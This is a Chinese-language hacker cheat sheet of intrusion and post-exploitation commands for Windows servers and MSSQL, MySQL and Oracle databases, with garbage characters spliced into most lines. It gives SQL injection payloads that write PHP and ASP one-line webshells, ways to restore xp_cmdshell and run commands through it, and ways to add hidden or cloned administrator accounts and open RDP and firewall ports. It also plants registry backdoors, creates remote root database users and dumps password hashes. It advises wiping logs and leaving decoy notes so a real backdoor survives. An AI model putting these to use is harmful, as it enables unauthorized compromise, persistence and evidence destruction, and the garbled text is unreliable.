5 V& F! g2 M% n- F1 o, ^1.net user administrator /passwordreq:no
$ K' y' @0 T9 M这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
' c# d& y' V& t' |# l5 |5 L2.比较巧妙的建克隆号的步骤
2 `4 l( B* F, U5 t先建一个user的用户4 Z) t9 D& v) k7 N( ~4 A
然后导出注册表。然后在计算机管理里删掉' H: G$ t, N6 } h% F6 p( v
在导入,在添加为管理员组. c/ r4 B7 b6 U' i* ]
3.查radmin密码
# s' \. ~: W" h% t8 J: q( A" O$ Ereg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
+ u6 V$ X, L8 j% R5 z9 h6 ]4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
& l( }: D$ r+ x- f" X; R& v. Z建立一个"services.exe"的项9 n6 r! e( W, i$ F
再在其下面建立(字符串值)5 Q" U9 X3 t+ D7 l
键值为mu ma的全路径! j8 `/ ^5 A8 o) I# d
5.runas /user:guest cmd2 I$ L: e, G% Y) x/ W
测试用户权限!, h% J4 ]$ g; d2 V
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
# V4 ?2 T& o* W4 F7.入侵后漏洞修补、痕迹清理,后门置放:
- p) D" u% p) D基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门) }, R, H+ i. E& U) z5 s2 s
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c; | m0 ?0 \8 s: r+ l- k% \
4 m9 V) |: J$ E0 f9 Wfor example8 w" J; k- W8 [& L- a/ l
- ~* G: b# t2 \. m& u' Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add', s- z1 z( {. G
7 ~$ l) p2 y) r% l- y' c2 N, T4 D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add' q& [% ?. o0 ?- }2 K) a/ D0 t- C! o
! w3 q1 P2 T0 h" V7 b( R- n
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了' q4 o! d/ z' _0 e2 f3 i6 u
如果要启用的话就必须把他加到高级用户模式( n$ c7 \ s7 `7 k
可以直接在注入点那里直接注入3 d& v# F& G3 ^) g
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
6 d. [5 \+ w4 @然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
9 Q. l$ g* G) {; c$ B或者: {, m1 U7 h/ {* b* y
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'( K2 m" F# M. {
来恢复cmdshell。9 z& U+ x- O6 q6 ]% J. p' p1 y
3 M- @: Q6 l; e' v7 \* f6 R分析器( t0 V% Y7 {* O* s6 @" {
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--; f* p$ v: B0 H+ W7 z. Z4 h
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
7 f8 n8 X, R- U3 h' p10.xp_cmdshell新的恢复办法
- s! A2 h" C, kxp_cmdshell新的恢复办法
2 A. Y! Q2 k8 z8 _6 O6 G2 b扩展储存过程被删除以后可以有很简单的办法恢复:
) z1 {( G4 L& d6 H- H/ B' m删除* U& X J* a9 v3 H" {
drop procedure sp_addextendedproc
* w5 N1 s0 V# ], i, C9 U; V2 ]& pdrop procedure sp_oacreate$ d8 L9 `5 Z; R- j1 b
exec sp_dropextendedproc 'xp_cmdshell'
7 Z) V1 ~* z) m `& H% g4 ?0 ^* O7 ^9 Y4 j3 I" z
恢复4 ]7 i5 q! I: D0 I
dbcc addextendedproc ("sp_oacreate","odsole70.dll")3 @8 Z" k% g( @ r3 t+ w
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
, Q! G) L& v# O$ p1 X6 x/ c
* X( @, o8 s& A* @$ G- x这样可以直接恢复,不用去管sp_addextendedproc是不是存在
6 q' E2 g1 g Q1 X
0 m8 x3 z( U- Z1 {& z-----------------------------! D3 `4 c; b. \* [( w! K% N6 L8 c
1 ]9 P( f7 S6 O2 q
删除扩展存储过过程xp_cmdshell的语句:
8 e$ E' @. h/ i; t( P/ b) v, Wexec sp_dropextendedproc 'xp_cmdshell'
/ V6 u/ J2 M& H0 ?: [5 x* {
. i. m5 v# |5 O% E$ o( X恢复cmdshell的sql语句
5 H# ~0 _! d# U3 b6 D: eexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'' C6 f- L9 g( g2 P t3 J0 h1 p) x! g
6 T6 e% e+ |7 p
& e; n D0 D" [6 } C& b U% G开启cmdshell的sql语句6 P8 u2 _% L Q! [* x2 N
" n+ @7 m$ X" t/ e! J' {exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 F; _! Y# B! V& e: j% y" j% q8 I7 ?. K4 {
判断存储扩展是否存在
- `) ~1 p" T' B8 C" gselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
$ X: U" ~) K1 z2 \- ?返回结果为1就ok
1 F, T1 H$ y9 y3 U2 _: O) F- h
8 u8 ~* a( |$ x* O( w/ j G恢复xp_cmdshell4 u/ }2 x+ P- _ j4 U
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
5 O/ e( U1 x- M& N) T& H7 C; v9 a' ]返回结果为1就ok
$ n' E5 R e+ I' M; T7 |$ X
4 ? S1 Z1 r3 W6 K! H4 L否则上传xplog7.0.dll
' f6 g% |6 W' e2 h& `# L; Nexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'% |7 h) _! D s& W# W7 H% O
' W) W7 G' n9 W- Z5 x. w! J& G
堵上cmdshell的sql语句) n5 A3 Y) ^0 _' n9 O& m- r
sp_dropextendedproc "xp_cmdshel( v* R3 A: A% m6 n6 F3 L
-------------------------$ q& [2 }$ i6 D3 n" _7 b- y
清除3389的登录记录用一条系统自带的命令:
' R! _! O: y B R- \) }% greg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
5 K2 e. r9 }( Z- u9 l3 N) ^) n# k5 u3 M3 w* r
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
0 G0 F# N" X2 J在 mysql里查看当前用户的权限
3 I! y0 K# N+ m; t$ Oshow grants for
% J' o6 M' B# x/ {' }+ m; c. l$ S- f" G1 E3 v$ R
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。0 K K6 m$ ?: r9 k' G$ n( i
+ `* l* U- W# T" O' a& i
; e0 p/ z$ d4 ?4 V3 F/ t
Create USER 'itpro'@'%' IDENTIFIED BY '123';
6 Y" z$ X$ D# K$ L
( P: N! P* f$ u) e1 l' V9 l! rGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION- J" {) L) G6 i0 ]9 i1 T
* E6 Z t+ ~* N, D5 G" i, cMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
: y8 H ^3 L8 y4 z' Z9 y
+ ]! j+ y' ]9 fMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
& p# d2 P7 x3 m7 Y4 n5 b6 X5 q- y9 V( ?5 y& ^
搞完事记得删除脚印哟。
1 v: p. [7 ~+ h
1 R4 P! m" ^; A+ x) `Drop USER 'itpro'@'%';8 Y0 v* R& R3 ^# M; j! s7 h" u
: u) [/ N r0 ~& V' V/ P! Y
Drop DATABASE IF EXISTS `itpro` ;+ w X& `0 S( W9 F0 l5 u
- P" A1 g7 m5 o5 \. x
当前用户获取system权限/ L) `: t7 u+ b M
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
# _4 ]7 C$ q3 o0 N! I* V% ?- q% m. Isc start SuperCMD1 _% l& E2 ~1 a
程序代码
# {' f, u' r: m9 ^4 n; ? i- e<SCRIPT LANGUAGE="VBScript">; B& o7 O$ E. W- b
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
4 K# a& F6 _( d) n7 gos="WinNT://"&wsnetwork.ComputerName
+ L" f, }% O9 A+ ~/ cSet ob=GetObject(os)
, A% ^" y* }, b2 ^Set oe=GetObject(os&"/Administrators,group")
/ |( d6 {" a! m4 DSet od=ob.Create("user","nosec"): h1 w) H9 g% j/ b8 e; [
od.SetPassword "123456abc!@#"
3 t& J" {# l9 Z4 [9 ?3 w) F# Mod.SetInfo p2 Z4 q$ e2 e% R; B$ t
Set of=GetObject(os&"/nosec",user)
1 e5 A- V2 N" ^ koe.add os&"/nosec"
: U9 ?; `# p+ ?7 I) f1 f+ S</Script>
) {7 v) ~( T3 v' S* z1 [9 z5 f& |<script language=javascript>window.close();</script>
( A' `" \( H- ~7 m& _. t# s& O, O, ^ w) k/ C
/ h0 a! v: H, G% s! [( f9 T
) H1 s3 Y* R8 j' S' ]' E' n/ M+ [# d! ~) e+ c/ C! [ I+ W4 V
突破验证码限制入后台拿shell
, [) F! k& w+ u" c7 ^: O程序代码$ ~6 Q6 D& p- N$ K ?1 P
REGEDIT4 & V+ M; x' B. U' N& j7 G
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] q$ L; ]* F9 m4 \6 N' n
"BlockXBM"=dword:00000000
/ Y4 r5 E4 @* d
- S- [' v2 O, h2 I3 E保存为code.reg,导入注册表,重器IE6 `& }0 j d4 c- H% \! `
就可以了4 c6 _$ X9 T, R2 Q* q7 I
union写马- c4 Y7 `+ X. c0 E; z3 H
程序代码, e; U; B6 ~* j+ W) l) U
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
8 }0 I) z. z5 p8 d9 A& {+ t6 b _4 L# j( j' G! x. Z' \9 [* F
应用在dedecms注射漏洞上,无后台写马
5 U% S. m" V* c2 M* Q7 n: N1 `' Sdedecms后台,无文件管理器,没有outfile权限的时候
0 S/ @# a- H2 F( j3 x7 A3 a$ e5 m& o在插件管理-病毒扫描里! z! p6 W8 r/ l5 y+ u. I O; \
写一句话进include/config_hand.php里$ I3 i4 y( Z' a$ `
程序代码- T0 \3 O. k# u
>';?><?php @eval($_POST[cmd]);?>
; ~4 A" T; n/ P+ ?+ W: f
) ]0 d9 E. k4 }& m9 A" X, Y7 H
1 C/ Y* E5 [9 T1 e Y) t如上格式* H5 U2 V+ ^' _- r ^! U+ R
5 m* ?; W3 d) U8 w& H% u$ R( Voracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解( i. @' ]& i' ^9 O& ~* e
程序代码
$ L- {& N( k$ ^0 G$ A: T$ ^select username,password from dba_users;
" c5 g; S: Z6 Q, p* H9 ^* v0 J) B
1 N, R5 V; \5 W# R: _4 a" R. H6 @/ z h) Z1 z1 S7 G
mysql远程连接用户' E( A! a, U) D* @+ m/ Q3 n6 z
程序代码
, q6 o; d% }2 ~' n
: Z' A: J: S7 N# oCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
, M4 W( I; Y9 G0 W/ UGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
g% j- S+ P4 ]& ]5 N% PMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 08 I# M! X8 {5 Y& \! ^: r
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
0 j. C- Q) V& X9 F0 E1 Q6 b' Y4 ]4 p
2 u2 c' b& D' N2 F$ r* x+ ]& Z1 W" o8 A% l) C" s" M, [) h; a
+ U2 f8 |! m# Kecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0% n/ `3 j2 X3 e
# E- I W0 A @+ j$ V4 F( d: ~1.查询终端端口9 h/ L b( |9 B
% Y- D. F5 W$ `xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber$ V% G9 c2 ~; R3 e3 `0 P3 n
. d6 Q8 E7 A' l2 N通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"+ f8 M7 U7 _% q
type tsp.reg
v/ K; X) a0 Z7 @) {; I
, A% v5 O& g( Y9 P! Z, @2.开启XP&2003终端服务. e' A- i6 w" ~- ~
. e2 A! g( f! e( Z, a% \- d
m- [3 g0 H4 n' Z0 MREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
0 d E% W d$ ^7 ~& e5 k! H
T& Q- u H1 A% l; Q3 s- _, A+ D: p! G4 C* L- F7 c6 o8 F
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f) Q* _0 K0 i' ]4 B; _5 }* T, Q& d F
5 _) _' Z: y2 T" g9 _! C3 [8 n3.更改终端端口为20008(0x4E28)
u( y+ N! b& ~0 M7 o
8 e' y) Q: H+ q7 HREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
& O" O# y9 H: P) R
. f" x+ k% q7 iREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
% X6 s) ]# \9 L; k0 a. b- K2 Z7 W* T7 s: b6 z; {4 ?% Z l
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制0 A, W9 H1 x# z6 m ?
2 }! o1 ?4 Z8 I( Y* f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
0 o7 s! E% [* X) c: l
L" @( c& r% A
6 J3 X. ~; f% B3 y9 O5 }5.开启Win2000的终端,端口为3389(需重启)
. h( p2 p% j8 Q3 X) @2 d* K) `) U$ e2 x! B
echo Windows Registry Editor Version 5.00 >2000.reg
9 x% K! E5 H1 @echo. >>2000.reg
; N/ z9 @, o1 B) zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 6 D" V/ g5 C. P
echo "Enabled"="0" >>2000.reg " ?: y- M9 C& [! | M" |
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg & O) x4 R1 s7 o0 q
echo "ShutdownWithoutLogon"="0" >>2000.reg , x v; A- X" H9 [
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
; F/ b* c& j0 A6 q. decho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
8 l0 A9 K, q# I/ \1 r+ @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg ! G5 r# k3 A" Y9 R5 ~
echo "TSEnabled"=dword:00000001 >>2000.reg
; a* h+ ~ l+ \! Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
. c8 s* ~9 r' _( qecho "Start"=dword:00000002 >>2000.reg
" J$ q. Q( T, t; ~9 \) [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
& y$ ]% C8 r9 O" ]6 y* }echo "Start"=dword:00000002 >>2000.reg 4 L* M( J9 ~* ^2 J5 B3 Z
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg 4 {2 ~6 y' K' Z6 f: X: J
echo "Hotkey"="1" >>2000.reg ; U2 f0 [/ e/ O4 S1 Y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
. _& B& n* g' h' y, Necho "ortNumber"=dword:00000D3D >>2000.reg
- {6 {8 B8 F% I4 lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
( @; L; J7 L7 T5 _. m8 G2 wecho "ortNumber"=dword:00000D3D >>2000.reg
0 h& w6 U+ R! O6 q7 ?% o4 @
* Q* p& X) b) x5 b) \6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
0 F" l# N' [# k: D% m4 X+ r9 H+ S8 x# p1 n: K9 c2 d7 h
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf6 m0 q# J( m. D4 L2 n$ d1 u: Z# |1 @( |
(set inf=InstallHinfSection DefaultInstall)
( d$ c: [" x% x8 l+ E( Mecho signature=$chicago$ >> restart.inf7 R' s& J( g' v7 E$ Z
echo [defaultinstall] >> restart.inf: j+ _# H. r5 @% L
rundll32 setupapi,%inf% 1 %temp%\restart.inf
' M7 N3 f5 w* H1 x% P% s5 y
' o7 b& E4 w8 S' I. J3 n. V0 H: m* W( s- i) p
7.禁用TCP/IP端口筛选 (需重启)
i i2 ]( k! R; @* v5 U; J8 k0 v% C( e/ C* T8 Q0 s3 i
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f; W% S q p" j6 P
1 q5 F" E1 \) K6 W
8.终端超出最大连接数时可用下面的命令来连接
/ a* x: G+ {% |* B, h, H y- K$ [! H# a2 }' T# ^# p1 W/ l- x, c+ ]
mstsc /v:ip:3389 /console
; P9 N% x+ g: V% T2 K9 J! s- _6 h: ?% h0 r; b
9.调整NTFS分区权限
/ T- l+ I+ X9 E/ Z9 {: w7 K) B4 D# b; n. t' u
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
: O$ E+ _4 q& c
3 a( Z* g' t* _+ i2 Q1 Pcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
: Z6 }/ A K) z4 Y8 p
/ X$ A! j; [2 u( i3 [) P; T------------------------------------------------------- n; P f3 e+ F# i) D" |( ]
3389.vbs
8 D% T k8 e' f5 Y! a/ a) aOn Error Resume Next! t* K @9 |/ e; ^6 ] V0 p
const HKEY_LOCAL_MACHINE = &H80000002
4 A' s F7 P8 W! A9 [2 x# ustrComputer = "."; ^' o* a$ M. Y8 x
Set StdOut = WScript.StdOut8 [2 N3 g: b5 E- V( A$ c3 [% s
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
/ P, ~: @" ]# K2 Y3 k! L4 mstrComputer & "\root\default:StdRegProv") j' F+ ^: G2 C o2 M! V3 V- }8 \
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
. C& o0 i- S2 M6 X( _oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
4 X# b+ }( I8 M7 vstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"% {' e5 M* k0 Z7 b& X% y7 d
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
2 J5 k% x. k: S% istrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"' ]3 ]# Q/ [! Y1 r# P9 ?, Y) ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
. G# {& U3 @) M5 D/ w5 V0 n8 kstrValueName = "fDenyTSConnections"" ?0 ]) G( n6 V. H6 ~8 v
dwValue = 0
`. X/ ~' N& ]* Q. P/ poreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 o8 U8 [. t# RstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"2 ^( L4 X# D9 j4 {$ w2 X
strValueName = "ortNumber"3 C3 X& ] z1 w' x, K4 b
dwValue = 3389
; ]* A ], \7 \1 }) r) Foreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue* d* i; a$ h4 `) v3 Y, ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 x, `# q7 G* P$ istrValueName = "ortNumber"
7 f! Y# u: [ m: i( ZdwValue = 3389( ]; o9 S1 ]: \' F! L. j
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue6 f5 I m6 r& [& ]/ K6 C; \3 m3 K
Set R = CreateObject("WScript.Shell") . a s+ S1 j0 n O6 W
R.run("Shutdown.exe -f -r -t 0")
! u9 k- b/ g9 L( k8 s9 R. N
8 A# }2 J+ `. R$ A7 x0 K% A/ ]- W删除awgina.dll的注册表键值" k9 n! j, r( i9 e
程序代码
4 d! H( X3 e( k' D% n! H6 z9 S/ o
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f9 a: ?2 Y) q% w+ M9 w! U* d4 ^7 i( ~
' L3 F# |: W1 k0 b
5 Y% N2 D! b4 I' d6 q
8 Y$ w5 t0 d# X( U' Z; ]. u) V- ~( M8 q7 t9 k F$ Z9 ^ n
程序代码
: r, |* h* ^! Y( l8 FHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
/ B9 T1 B& w7 l$ K' ~+ _" u1 d, ]8 i! E: k( O, _0 A6 l7 C
设置为1,关闭LM Hash$ ^( A1 g( ^- T- v1 }1 f
0 r9 ^! V; o' ]+ K/ \, X0 I# ^
数据库安全:入侵Oracle数据库常用操作命令
6 S- |$ ^# `+ x/ ?! K3 H" I3 S最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。' ` O& m0 f) c$ L( F4 p
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。, h8 b! v1 N9 l& |0 _3 `
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; ]) Z# g( {; ~8 _* [+ [
3、SQL>connect / as sysdba ;(as sysoper)或
' E- m0 _, R! @0 d) Zconnect internal/oracle AS SYSDBA ;(scott/tiger)
+ B: F& B) a H$ w$ Mconn sys/change_on_install as sysdba;- ?3 F1 H+ a" N. {; d4 G- _
4、SQL>startup; 启动数据库实例
4 p$ q/ }- z. }1 U; n5、查看当前的所有数据库: select * from v$database;3 s6 t5 l+ b I% t
select name from v$database;
& ]5 V( I- f9 F/ [5 q! s6、desc v$databases; 查看数据库结构字段
* R$ ^: M8 H* z7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
$ \6 r( p$ X: E4 |- NSQL>select * from V_$PWFILE_USERS;. u2 u9 l3 T8 X% k8 R/ C
Show user;查看当前数据库连接用户+ G/ ~' v' ^1 D. A5 N) v3 ~
8、进入test数据库:database test;* z, d7 g! Z2 a2 m9 u; x& ?
9、查看所有的数据库实例:select * from v$instance;' L# `3 _7 F8 _6 \) Z
如:ora9i# r4 _) A; m! Z" J- N- @
10、查看当前库的所有数据表:
2 x" ~4 l8 ?$ O7 \$ v8 i% E, i vSQL> select TABLE_NAME from all_tables;2 Y i+ O( U- N; f0 `) k& @
select * from all_tables;# O8 D1 u3 a3 a) |. E, d
SQL> select table_name from all_tables where table_name like '%u%';
# b, Q8 o# y/ t7 M( ~5 \TABLE_NAME
5 D& a/ D. ]/ X9 [" z, P------------------------------
! O' }! A& `1 \3 ^_default_auditing_options_' p1 n! u& x7 o7 M( F. `
11、查看表结构:desc all_tables;+ H6 j2 q5 W( G
12、显示CQI.T_BBS_XUSER的所有字段结构:7 D8 s8 p0 S% y& K% _* q1 R
desc CQI.T_BBS_XUSER;
/ g" X2 S$ V1 o& }# f13、获得CQI.T_BBS_XUSER表中的记录:5 a) @. i3 z f A
select * from CQI.T_BBS_XUSER;% k% b4 b6 q i# ]2 I. s V% ?
14、增加数据库用户:(test11/test)
4 Z$ X* r+ P' [: w* u) L: R% d0 Ocreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
p1 l1 l, v% l1 [15、用户授权:
- P! y) A1 |- [& n& e1 sgrant connect,resource,dba to test11; |% U$ z; ?4 W. F
grant sysdba to test11;
+ V) g1 K6 |& Ncommit;( K* q" S( j! A( ^$ u
16、更改数据库用户的密码:(将sys与system的密码改为test.)
8 ~$ {$ Q9 B7 ] ^alter user sys indentified by test;
: P0 @7 {% ?7 ualter user system indentified by test;
/ _% D$ U, }" I' y, V
0 f7 y& R% o0 A" Y/ l% F0 capplicationContext-util.xml
* |0 [( {7 V/ |# c/ Y+ \applicationContext.xml
4 q7 O& V# d9 n/ h8 ~2 m/ J: Z/ tstruts-config.xml
! H4 e# Y6 X5 M. @web.xml
3 p0 z! ~- \; R& x- T, x( @server.xml
/ t. N& @& I6 m( z* }: D2 Gtomcat-users.xml
: S+ v4 T1 y- b' h, p" Khibernate.cfg.xml- p: h/ O* v: [
database_pool_config.xml: z% D; Q. {( w e
( f" H" q4 Y5 f( `# L7 @3 P& j8 w4 X9 Y7 _
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置; Q# N7 |& B6 m8 K
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
" e1 a& H9 Q; K7 O4 x" d; u\WEB-INF\struts-config.xml 文件目录结构" p0 h& ? x! {! e+ c
3 E* X. n2 }. _; {6 Z# jspring.properties 里边包含hibernate.cfg.xml的名称6 B& I! O8 G; F" {7 x l8 w) U
0 v( w/ r) e9 x; z0 X% h- Q' n
3 f& C c5 m- v4 {! @" mC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
* Q* y8 P4 D( X0 q( |! j6 _% L2 v
如果都找不到 那就看看class文件吧。。
) ~: c: }# G2 z$ m ?* C) D
9 r8 `% h* ]) P2 p6 ?8 M" @测试1:: l/ ^5 W+ Q) w% Y) F* W! Z
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t12 s% T0 T# T! b8 B; {
5 I) u% e, S/ F; F5 e* j. d
测试2:
+ m5 l5 W) U' Z- r6 i9 p& p* v4 s# @4 P+ Z' @( \
create table dirs(paths varchar(100),paths1 varchar(100), id int)
a; p1 @0 j) h- x3 }
; x6 _" Y, E# y8 W& Qdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, ?* N3 |! \, p
1 i2 V/ S/ m. p$ eSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1: `4 z# S5 @- z$ R* p
: \& P6 L" @, m C8 ]( {
查看虚拟机中的共享文件:7 C6 q8 `1 t8 u: _) I2 ]8 E+ p; _
在虚拟机中的cmd中执行$ F4 S1 d: e! l8 V9 k: k
\\.host\Shared Folders
& @5 ^* R$ r5 _0 m: R$ {8 b6 a1 O- s: t3 K9 `( q
cmdshell下找终端的技巧
* d3 O8 o l& ~4 O, R1 G找终端:
2 {8 ]; [! _ I& j: H: @第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 0 `2 U: v# a9 d- R/ _$ x
而终端所对应的服务名为:TermService . o6 V3 [! p1 b4 ]4 Q1 Y9 @
第二步:用netstat -ano命令,列出所有端口对应的PID值! + r3 X; P) K$ ?4 y" R3 P' y- F7 v
找到PID值所对应的端口
+ p% p& v& H; b
7 f. ]' r( J8 a. ^查询sql server 2005中的密码hash
1 _# d, m1 w1 l, J" eSELECT password_hash FROM sys.sql_logins where name='sa'
8 }1 ]* g# w+ P( qSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
+ Y( j5 V6 i4 g/ |2 @; Saccess中导出shell1 ]* B$ p8 [3 p3 Z6 Y% g' X. I
1 j+ o# }8 H; Z0 ?* n" z中文版本操作系统中针对mysql添加用户完整代码:
, r( }6 M; i, L/ C
